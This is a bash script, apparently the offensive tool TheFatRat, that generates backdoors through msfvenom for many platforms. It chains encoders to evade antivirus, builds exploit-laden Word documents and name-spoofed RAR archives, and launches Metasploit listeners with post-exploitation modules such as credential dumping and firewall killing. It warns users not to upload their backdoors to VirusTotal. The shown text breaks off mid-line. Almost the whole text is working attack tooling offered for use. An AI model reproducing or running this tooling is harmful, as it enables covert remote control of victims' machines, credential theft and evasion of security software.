#!/usr/bin/env bash # THEFATRAT # # Welcome and dont disclaimer # fatrat Author By Edo -maland- { screetec } # Tested On , Backbox , kali Linux and Kali sana v.2 # contact me in screetsec@gmail.com or screetsec@dracos-linux.org # DISTRO Penetration From Indonesia : https://dracos-linux.org/ # Easy tool for generate backdoor with msfvenom ( part of metasploit framework ) # and program compiles a C program with a meterpreter reverse_tcp payload In it that can then be executed on # a windows host Program to create a C program after it is compiled that will bypass most AV # #WARNA KESUKAAN cyan='\e[0;36m' green='\e[0;34m' okegreen='\033[92m' lightgreen='\e[1;32m' white='\e[1;37m' red='\e[1;31m' yellow='\e[1;33m' BlueF='\e[1;34m' #Biru RESET="\033[00m" #normal orange='\e[38;5;166m' #Accurate method to detect user Distro lnx="Linux" lsb_release -i > temp/distro.tmp lsb_release -c > temp/codename.tmp rlname=`awk '{print $2}' temp/codename.tmp` dist=`awk '{print $3}' temp/distro.tmp` dist1=`awk '{print $4}' temp/distro.tmp` rm -f temp/codename.tmp >/dev/null rm -f temp/distro.tmp >/dev/null if [ "$dist" == "$lnx" ]; then dist0=$dist1 else dist0=$dist fi #SAMARAN TAMPAN path=`pwd` Versi=1.9.2 codename=Whistle OS=`uname` # distro=$dist0 disrov=$rlname SERVICE=service; apkembed='tools/apkembed.rb' # exec script path pwned='python tools/pw_exec.py' B='tools/prog.cs' C='tools/dad.c' apache='tools/apache.c' paycom='output/payload.c' pdfcom='output/pdf.c' bcom='output/Program.cs' pdfcom='output/pdf.c' apachecom='output/apache_com.c' out='output/ip.txt' pump='tools/pump.py' reverse1='temp/reverse1.c' stag='temp/stag.c' apkconfig=$path/config/apk.tmp unzip=unzip temp=$path/temp file="config/config.path" meterp="$path/temp/meterpreter.rc" outf="app_backdoor.apk" msploit=$path/logs/msploit.log lanip=`ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'` publicip=`dig +short myip.opendns.com @resolver1.opendns.com` hostn=`host $publicip | awk '{print $5}'` list=$path/config/listeners # spinner for Metasploit Generator spinlong () { bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ " barlength=${#bar} i=0 while ((i < 100)); do n=$((i*barlength / 100)) printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}" ((i += RANDOM%5+2)) sleep 0.02 done } # spinner for random seed generator spinlong2 () { bar=" 01100111001001001110111001101010101010110101001010111001010101010101010" barlength=${#bar} i=0 while ((i < 100)); do n=$((i*barlength / 100)) printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}" ((i += RANDOM%5+2)) sleep 0.02 done } #for checking if your command is correct gboor () { cat << ! Generate Backdoor +------------++-------------------------++-----------------------+ | Name || Descript || Your Input +------------++-------------------------++-----------------------+ | LHOST || The Listen Addres || $yourip | LPORT || The Listen Ports || $yourport | OUTPUTNAME || The Filename output || $fira +------------++-------------------------++-----------------------+ ! } #for checking if your command is correct when embed backdoor gboor2 () { cat << ! Generate Backdoor +------------++-------------------------++-----------------------+ | Name || Descript || Your Input +------------++-------------------------++-----------------------+ | LHOST || The Listen Addres || $yourip | LPORT || The Listen Ports || $yourport | OUTPUTNAME || The Filename output || $outf +------------++-------------------------++-----------------------+ ! } #Microsploit log file msploitr () { rm -rf $msploit >/dev/null 2>&1 touch $msploit echo "**********************************************" > $msploit echo "* Microsploit Log *" >> $msploit echo "**********************************************" >> $msploit echo " Metepreter Data " >> $msploit echo "----------------------------------------------" >> $msploit cat $meterp | while read LINE do echo $LINE >> $msploit done echo "----------------------------------------------" >> $msploit echo " Xterm Output " >> $msploit echo "----------------------------------------------" >> $msploit } #Checking [[ `id -u` -eq 0 ]] || { echo -e $red "Must be root to run script"; exit 1; } resize -s 33 84 > /dev/null clear #check config if [ -f "$file" ] then msfconsole=`sed -n 14p $file` msfvenom=`sed -n 15p $file` backdoor=`sed -n 16p $file` searchsploit=`sed -n 17p $file` aapt=`sed -n 11p $file` apktool=`sed -n 12p $file` else echo -e $red"Configuration file does not exists , run setup.sh first for config ." exit 1 fi #Jangan Nakal CTRL C MULU trap ctrl_c INT ctrl_c() { clear echo -e $red"[*] (Ctrl + C ) Detected, Trying To Exit ..." sleep 1 echo "" Stop echo -e $red"[*] Stop all service , Wait ..." sleep 1 echo "" echo -e $yellow"[*] Thank You For Using TheFatRat =)." echo "" echo -e $yellow"[*] Check Dracos Linux LFS, Penetration OS From Indonesia =P." exit } ######################### #CHECK DEPENDICIES ######################### clear echo -e $cyan" ____ _ _ _ " echo " / ___| |__ ___ ___| | _(_)_ __ __ _ " echo " | | | '_ \ / _ \/ __| |/ / | '_ \ / _\ | " echo " | |___| | | | __/ (__| <| | | | | (_| | _ _ _ " echo " \____|_| |_|\___|\___|_|\_\_|_| |_|\__/ | (_) (_) (_)" echo " |___/ " echo -e $lightgreen'-- -- +=[(c) 2016-2017 | dracos-linux.org | Linuxsec.org | Hacker Indonesia ' echo -e $cyan'-- -- +=[ Author: Screetsec < Edo Maland > ]=+ -- -- ' echo -e " " if [ $(id -u) != "0" ]; then echo [!]::[Check Dependencies] ; sleep 2 echo [✔]::[Check User]: $USER ; echo [✔]::[Distro]: $distro ; echo [✔]::[Release]: $rlname ; sleep 1 echo [x]::[not root]: you need to be [root] to run this script.; echo "" sleep 1 exit else echo [!]::[Check Dependencies]: ; sleep 1 echo [✔]::[Distro]: $distro ; echo [✔]::[Release]: $rlname ; echo [✔]::[Check User]: $USER ; fi ping -c 1 google.com > /dev/null 2>&1 if [ "$?" != 0 ] then echo [✔]::[Internet Connection]: DONE!; echo [x]::[warning]: This Script Needs An Active Internet Connection; sleep 2 else echo [✔]::[Internet Connection]: connected!; sleep 2 fi # check apache if exists which apache2 > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo [✔]::[Apache2 Server $distro ]: installation found!; else echo [x]::[warning]:this script require apache2 to work ; echo "" echo [!]::Run setup.sh to install apache2 ; echo "" sleep 2 exit 1 fi sleep 2 # check if ruby exists which ruby > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo [✔]::[Ruby]: installation found!; else echo [x]::[warning]:this script require ruby to work ; echo "" echo [!]::Run setup.sh to install ruby ; echo "" sleep 2 exit 1 fi sleep 2 # check if apktool exists which $apktool > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo [✔]::[Apktool]: installation found!; else echo [x]::[warning]:this script require apktool to work ; echo "" echo [!]::Run setup.sh to install apktool ; echo "" sleep 2 exit 1 fi sleep 2 # check if aapt exists which $aapt > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo [✔]::[Aapt]: installation found!; else echo [x]::[warning]:this script require aapt to work ; echo "" echo [!]::Run setup.sh to install aapt ; echo "" sleep 2 exit 1 fi sleep 2 #another apache2 locate if [ "$distro" = "Ubuntu" ]; then apache2="/var/www" elif [ "$distro" = "Kali" ]; then apache2="/var/www/html" elif [ "$distro" = "BackBox" ]; then apache2="/var/www/html" else apache2="/var/www/html" fi # check msfconsole which $msfconsole > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo [✔]::[Msfconsole]: installation found!; else echo [x]::[warning]:this script require msfconsole installed to work ; echo "" echo [!]::Run setup.sh to install metasploit-framework ; sleep 3 exit 1 fi sleep 2 # check if msfvenom exists which $msfvenom > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo [✔]::[Msfvenom]: installation found!; else echo [x]::[warning]:this script require msfvenom installed to work ; echo "" echo [!]::Run setup.sh to install metasploit-framework ; sleep 3 exit 1 fi sleep 2 # check zenity if exists which zenity > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo [✔]::[Zenity]: installation found!; else echo [x]::[warning]:this script require zenity installed to work ; echo "" echo [!]::Run setup.sh to install zenity ; echo "" sleep 2 exit 1 fi sleep 2 # check mingw if exists which i586-mingw32msvc-gcc > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo [✔]::[Mingw32 OR 64]: installation found!; COMPILER="i586-mingw32msvc-gcc" else which i686-w64-mingw32-gcc > /dev/null 2>&1 if [ $? -eq 0 ]; then echo [✔]::[Mingw32]: installation found!; COMPILER="i686-w64-mingw32-gcc" else echo [x]::[warning]:this script require mingw32 or 64 installed to work ; echo "" echo [!]::Run setup.sh to install ming32 ; sleep 2 exit 1 fi fi sleep 2 # check backdoor-factory if exists which $backdoor > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo [✔]::[Backdoor-factory]: installation found!; else echo [x]::[warning]:this script require backdoor-factory installed to work ; echo "" echo [!]::Run setup.sh to install backdoor-factory ; echo "" sleep 2 exit 1 fi sleep 2 # check monodevelop if exists which monodevelop > /dev/null 2>&1 which dmcs > /dev/null 2>&1 if [ -d $find ]; then echo [✔]::[Monodevelop]: installation found!; else echo [x]::[warning]:this script require monodevelop to work ; echo "" echo [!]::Run setup.sh to install monodevelop ; echo "" sleep 2 exit 1 fi sleep 2 # check xterm if exists which xterm > /dev/null 2>&1 if [ -d $find ]; then echo [✔]::[Xterm]: installation found!; else echo [x]::[warning]:this script require xterm to work ; echo "" echo [!]::Run setup.sh to install xterm ; echo "" sleep 2 exit 1 fi # check gnome-terminal if exists which gnome-terminal > /dev/null 2>&1 if [ -d $find ]; then echo [✔]::[Gnome-terminal]: installation found!; else echo [x]::[warning]:this script require gnome-terminal to work ; echo "" echo [!]::Run setup.sh to install gnome-terminal ; echo "" sleep 2 exit 1 fi # check upx if exists which upx > /dev/null 2>&1 if [ -d $find ]; then echo [✔]::[Upx]: installation found!; else echo [x]::[warning]:this script require upx to work ; echo "" echo [!]::Run setup.sh to install upx ; echo "" sleep 2 exit 1 fi #WARNING !!! resize -s 33 68 > /dev/null clear echo -e $red"" echo " "; echo "==================================================================" echo " WARNING ! WARNING ! WARNING ! WARNING ! WARNING ! " echo " YOU CAN UPLOAD OUTPUT/BACKDOOR FILE TO WWW.NODISTRIBUTE.COM " echo "==================================================================" echo " ____ _____ _____ _____ _____ _____ __ _____ _____ ____ "; echo "| \| | | |_ _| | | | _ | | | | _ | \ "; echo "| | | | | | | | | | | | | __| |__| | | | | | "; echo "|____/|_____|_|___| |_| |_____|__| |_____|_____|__|__|____/ "; echo " _____ _____ "; echo " |_ _| | "; echo " | | | | | "; echo " |_| |_____| "; echo " _____ _____ _____ _____ _____ _____ _____ _____ _____ __ "; echo "| | | | __ | | | __| |_ _| |_ _| _ | | "; echo "| | |- -| -| | |__ | | | | | | | | | | |__ "; echo " \___/|_____|__|__|_____|_____| |_| |_____| |_| |__|__|_____| "; echo "==================================================================" echo " PLEASE DON'T UPLOAD BACKDOOT TO WWW.VIRUSTOTAL.COM " echo " YOU CAN UPLOAD OUTPUT/BACKDOOR FILE TO WWW.NODISTRIBUTE.COM " echo "==================================================================" echo "" echo -n "Press any key to continue .............." read warning ############################## #CHECKING POSTGRESQL ############################# if ps ax | grep -v grep | grep postgresql > /dev/null then clear resize -s 33 84 > /dev/null echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo -e $white":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo -e $lightgreen"" echo " ___________ _ _______________ ___ __ ___ ___ _______ _______"; echo " / __/ __/ _ \ | / / _/ ___/ __/ / _ \/ / / / |/ / |/ / _/ |/ / ___/"; echo " _\ \/ _// , _/ |/ // // /__/ _/ / , _/ /_/ / / // // / (_ / "; echo "/___/___/_/|_||___/___/\___/___/ /_/|_|\____/_/|_/_/|_/___/_/|_/\___/ "; echo " "; echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo -e $white":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" sleep 2 else resize -s 33 73 > /dev/null clear echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo -e $white"::::::::::::::::::::$white "Metasploit service is not running"$white ::::::::::::::::::" echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo "" echo -e $white " /) " echo " // " echo " (( " echo " // " echo " .-. // .-. " echo " / \- ((=-/ \ " echo " \ \ / " echo " -( ___ ))__)- " echo " .-' // '-. " echo " / (( \ " echo " | * | " echo " \ / " echo " \ |_w_| / " echo " _) \ / (_ " echo " jgs (((---' '---))) " echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo -e $white":::::::::::::::: Wait for starting a Service Postgresql ::::::::::::::::" echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" fi #Started Service postgresql & apache if [ "$distro" = "Kali" ]; then /etc/init.d/postgresql start > /dev/null 2>&1 /etc/init.d/metasploit start > /dev/null 2>&1 /etc/init.d/apache2 start > /dev/null 2>&1 else /etc/init.d/postgresql start > /dev/null 2>&1 /etc/init.d/metasploit start > /dev/null 2>&1 /etc/init.d/apache2 start > /dev/null 2>&1 fi read -p "Press [Enter] key to Continue..." clear function Stop() { #Stoped Service postgresql & apache if [ "$distro" = "Kali" ]; then /etc/init.d/postgresql stop > /dev/null 2>&1 /etc/init.d/metasploit stop > /dev/null 2>&1 /etc/init.d/apache2 stop > /dev/null 2>&1 else /etc/init.d/metasploit stop > /dev/null 2>&1 /etc/init.d/apache2 stop > /dev/null 2>&1 /etc/init.d/postgresql stop > /dev/null 2>&1 fi } function cmsfvenom() { clear echo -e $okegreen" ===================================================================== " echo -e " | $cyan Create Payload with msfvenom ( must install msfvenom ) $okegreen | " echo -e $okegreen" ===================================================================== " echo -e $red" ___________ " echo -e " | |======[*** $yellow ____ _ " echo -e $red" | $yellow MSFVENOM $red \ $yellow / ___|_ __ ___ ____| |_ ___ _ __ " echo -e $red" |_____________\_______ $yellow | | | '__/ _ \/ _ | __/ _ \| '__|" echo -e $red" |==[v1.2 >]===========\ $yellow | |___| | | __/ (_| | || (_) | | " echo -e $red" |______________________\ $yellow \____|_| \___|\____|\__\___/|_| " echo -e $yellow" \(@)(@)(@)(@)(@)(@)(@)/ " echo -e $red" ********************* " echo "" echo -e $okegreen" ===================================================================== " echo -e " | $cyan Created by $red Edo Maland ( Screetsec ) $okegreen | " echo -e $okegreen" ===================================================================== " echo "" echo -e $okegreen " [1] LINUX >> FatRat.elf" echo -e " [2] WINDOWS >> FatRat.exe" echo -e " [3] ANDROID >> FatRat.apk" echo -e " [4] MAC >> FatRat.macho" echo -e " [5] PHP >> FatRat.php" echo -e " [6] ASP >> FatRat.asp" echo -e " [7] JSP >> FatRat.jsp" echo -e " [8] WAR >> FatRat.war" echo -e " [9] Python >> FatRat.py " echo -e " [10] Bash >> FatRat.sh" echo -e " [11] Perl >> FatRat.pl" echo -e " [12] doc >> Microsoft.doc "$yellow"( not macro attack )" echo -e $okegreen" [13] rar >> bacdoor.rar "$yellow"( Winrar old version)" echo -e $okegreen" [14] Back to Menu " echo -e " " echo -n -e $red' \033[4mCreator@fatrat:\033[0m>> '; tput sgr0 #insert your choice read fatrat1 if test $fatrat1 == '1' then echo "" spinlong echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport; read -p ' Please enter the base name for output files : ' fira payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "linux/ppc/shell_reverse_tcp" FALSE "linux/x86/shell_reverse_tcp" FALSE "linux/x86/meterpreter/reverse_tcp" FALSE "osx/armle/shell_reverse_tcp" FALSE "osx/ppc/shell_reverse_tcp" FALSE "bsd/x86/shell/reverse_tcp" FALSE "solaris/x86/shell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 spinlong echo "" echo "" gboor spinlong echo "" echo "" $msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f elf > output/$fira.elf echo -e "Shell Saved To output Folder " elif test $fatrat1 == '2' then echo "" spinlong echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport; read -p ' Please enter the base name for output files : ' fira payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" FALSE "windows/powershell_bind_tcp" FALSE "windows/powershell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 echo "" echo "" gboor spinlong echo "" echo "" $msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f raw -e x86/shikata_ga_nai -i 10 | $msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | $msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1| $msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | $msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o output/$fira.exe echo -e "Shell Saved To output Folder " elif test $fatrat1 == '3' then echo "" spinlong echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport; read -p ' Please enter the base name for output files : ' fira payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 echo "" echo "" gboor spinlong echo "" echo "" $msfvenom -p android/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.apk echo -e "Shell Saved To output Folder " elif test $fatrat1 == '4' then echo "" spinlong echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport; read -p ' Please enter the base name for output files : ' fira spinlong echo "" echo "" gboor spinlong echo "" echo "" $msfvenom -p osx/x86/shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f macho > output/$fira.macho echo -e "Shell Saved To outputFolder " elif test $fatrat1 == '5' then echo "" spinlong echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport; read -p ' Please enter the base name for output files : ' fira spinlong echo "" echo "" gboor spinlong2 echo "" echo "" $msfvenom -p php/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.php echo -e "Shell Saved To output Folder " elif test $fatrat1 == '6' then echo "" spinlong echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport; read -p ' Please enter the base name for output files : ' fira spinlong echo "" echo "" gboor spinlong2 echo "" echo "" $msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f asp > output/$fira.asp echo -e "Shell Saved To output Folder " elif test $fatrat1 == '7' then echo "" spinlong echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport; read -p ' Please enter the base name for output files : ' fira spinlong echo "" echo "" gboor spinlong2 echo "" echo "" $msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > output/$fira.jsp echo -e "Shell Saved To output Folder " elif test $fatrat1 == '8' then echo "" spinlong echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport; read -p ' Please enter the base name for output files : ' fira spinlong echo "" echo "" gboor spinlong2 echo "" echo "" $msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f war > output/$fira.war echo -e "Shell Saved To output Folder " elif test $fatrat1 == '9' then echo "" spinlong echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport; read -p ' Please enter the base name for output files : ' fira spinlong echo "" echo "" gboor spinlong2 echo "" echo "" $msfvenom -p cmd/unix/reverse_python LHOST=$yourip LPORT=$yourport -f raw > output/$fira.py echo -e "Shell Saved To output Folder " elif test $fatrat1 == '10' then echo "" spinlong echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport; read -p ' Please enter the base name for output files : ' fira spinlong echo "" echo "" gboor spinlong2 echo "" echo "" $msfvenom -p cmd/unix/reverse_bash LHOST=$yourip LPORT=$yourport -f raw > output/$fira.sh echo -e "Shell Saved To output Folder " elif test $fatrat1 == '11' then echo "" spinlong echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport; read -p ' Please enter the base name for output files : ' fira spinlong echo "" echo "" gboor spinlong2 echo "" echo "" $msfvenom -p cmd/unix/reverse_perl LHOST=$yourip LPORT=$yourport -f raw > output/$fira.pl echo -e "Shell Saved To output Folder " elif test $fatrat1 == '12' then echo echo -e $yellow" Worked on Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] " echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" echo -ne " SET LHOST : ";tput sgr0 read yourip echo "" echo -ne $okegreen " SET LPORT : ";tput sgr0 read yourport echo "" echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0 read fira echo "" payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 spinlong echo "" echo "" gboor spinlong echo "" xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set payload $payloads ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'" echo "" mv ~/.msf4/local/$fira.doc $path/output/$fira.doc echo -e $okegreen"" echo -e $yellow" Backdoor doc Saved To output Folder " echo "" echo -ne $okegreen" Press any key to continue ......... " read continue elif test $fatrat1 == '13' then echo echo -e $yellow" Worked on All Windows " echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" echo -ne " SET LHOST : ";tput sgr0 read yourip echo "" echo -ne $okegreen " SET LPORT : ";tput sgr0 read yourport echo "" echo -ne $okegreen " Please enter the base name for output files ex: test.zip / test.rar):" ;tput sgr0 read fira echo "" echo -ne $okegreen " Please enter spoofed file name to show ex : stuff.txt :" ;tput sgr0 read fira2 echo "" payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 spinlong echo "" echo "" gboor spinlong echo "" xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payloads; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'" echo "" mv ~/.msf4/local/$fira $path/output/$fira echo -e $okegreen"" echo -e $yellow" Backdoor Saved To output Folder " echo "" echo -ne $okegreen" Press any key to continue ......... " read continue elif test $fatrat1 == '14' then clear menu else echo -e " Incorrect Number" fi echo "" echo -n -e $okegreen"Do you want exit? ( Yes / No ) : " read back if [ $back != 'n' ] && [ $back != 'N' ] then clear exit elif [ $back != 'y' ] && [ $back != 'Y' ] then cmsfvenom fi } function clisteners() { clear echo -e $okegreen" ===================================================================== " echo -e " | $cyan Create Listener with metasploit ( must install metasploit ) $okegreen | " echo -e $okegreen" ===================================================================== " echo -e $red" .____ .__ __ "; echo " | | |__| _______/ |_ ____ ____ ___________ ______" echo " | | | |/ ___/\ __\/ __ \ / \_/ __ \_ __ \/ ___/" echo " | |___| |\___ \ | | \ ___/| | \ ___/| | \/\___ \ " echo " |_______ \__/____ > |__| \___ >___| /\___ >__| /____ >" echo " \/ \/ \/ \/ \/ \/ " echo -e $" >> v1.3 " echo -e $okegreen" ===================================================================== " echo -e " | $cyan Created by $red Edo Maland ( Screetsec ) $okegreen | " echo -e $okegreen" ===================================================================== " echo "" echo -e $okegreen" [1] Listeners for payload linux" echo -e " [2] Listeners for payload Windows" echo -e " [3] Listeners for payload Mac" echo -e " [4] Listeners for payload Android" echo -e " [5] Load a saved Listener" echo -e " [6] Back to Menu " echo -e " " echo -n -e $red' \033[4mListeners@fatrat:\033[0m>> '; tput sgr0 #insert your choice read fatrat1 if test $fatrat1 == '1' #LINUX then rm temp/*.rc > /dev/null 2>&1 touch "temp/meterpreter_linux.rc" echo use exploit/multi/handler > "temp/meterpreter_linux.rc" payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "linux/ppc/shell_reverse_tcp" FALSE "linux/x86/shell_reverse_tcp" FALSE "linux/x86/meterpreter/reverse_tcp" FALSE "osx/armle/shell_reverse_tcp" FALSE "osx/ppc/shell_reverse_tcp" FALSE "bsd/x86/shell/reverse_tcp" FALSE "solaris/x86/shell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 echo set PAYLOAD $payload >> "temp/meterpreter_linux.rc" echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" read -p ' Set LHOST IP: ' uservar echo set LHOST $uservar >> "temp/meterpreter_linux.rc" read -p ' Set LPORT: ' uservar echo set LPORT $uservar >> "temp/meterpreter_linux.rc" echo set ExitOnSession false >> "temp/meterpreter_linux.rc" echo exploit -j >> "temp/meterpreter_linux.rc" zenity --question --text="Do you want to save this configuration to use in future ?" if [ $? = 0 ] ; then save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="linux-config"); cp $path/temp/meterpreter_linux.rc $list/$save.rc >/dev/null 2>&1 echo -e okegreen "Configuration file saved to $list/$save.rc" xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_linux.rc" clear else xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_linux.rc" clear fi elif test $fatrat1 == '2' #Windows then rm temp/*.rc > /dev/null 2>&1 touch "temp/meterpreter_windows.rc" echo use exploit/multi/handler >> "temp/meterpreter_windows.rc" payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" FALSE "windows/powershell_bind_tcp" FALSE "windows/powershell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 echo set PAYLOAD $payload >> "temp/meterpreter_windows.rc" pe=$(zenity --list --title "☣ TheFatRat ☣" --text "\npost-exploitation module to run" --radiolist --column "Pick" --column "Option" TRUE "sysinfo.rc" FALSE "fast_migrate.rc" FALSE "cred_dump.rc" FALSE "gather.rc" FALSE "auto_migrate+killfirewall.rc" --width 350 --height 240) > /dev/null 2>&1 echo -e $okegreen "" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $green "" read -p ' Set LHOST IP: ' uservar echo set LHOST $uservar >> 